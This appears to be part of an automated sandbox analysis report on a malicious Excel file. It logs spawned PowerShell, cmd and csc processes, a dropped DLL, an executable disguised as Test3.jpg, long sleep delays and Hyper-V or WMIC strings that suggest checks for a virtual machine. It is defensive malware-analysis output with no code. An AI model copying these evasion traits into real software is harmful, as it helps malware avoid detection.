      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxmlJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xamlJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5429Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1580Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgWindow / User API: threadDelayed 2267Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dllJump to dropped file
      Source: C:\Windows\System32\conhost.exe TID: 6928Thread sleep count: 213 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep count: 5429 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep count: 41 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052Thread sleep count: 1580 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7024Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5676Thread sleep count: 2267 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5784Thread sleep count: 38 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5784Thread sleep time: -380000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5840Thread sleep time: -3689348814741908s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5192Thread sleep count: 297 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5192Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread sleep count: Count: 2267 delay: -10Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,29_2_00426F7A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo,29_2_0044A238
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterExtendedAcl
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Connect-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapterExtendedAcl
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.drBinary or memory string: Test-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: )Get-VMNetworkAdapterFailoverConfiguration
      Source: ModuleAnalysisCache.3.drBinary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterRdma
      Source: ModuleAnalysisCache.3.drBinary or memory string: (Set-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterAcl
      Source: ModuleAnalysisCache.3.drBinary or memory string: )Set-VMNetworkAdapterFailoverConfiguration
      Source: ModuleAnalysisCache.3.drBinary or memory string: Rename-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterVlan
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.drBinary or memory string: (Add-VmNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: "Remove-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterAcl
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMScsiController
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VmNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VmNetworkAdapterRoutingDomainMapping
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMScsiController
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterRdma
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterRoutingDomainMapping
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterVlan
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VmNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.drBinary or memory string: Disconnect-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: "Remove-VMNetworkAdapterExtendedAcl
      Source: ModuleAnalysisCache.3.drBinary or memory string: KC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.drBinary or memory string: +Remove-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: (Add-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: (Get-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapterAcl
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterFailoverConfiguration
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VmNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMScsiController
      Source: ModuleAnalysisCache.3.drBinary or memory string: OC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterFailoverConfiguration
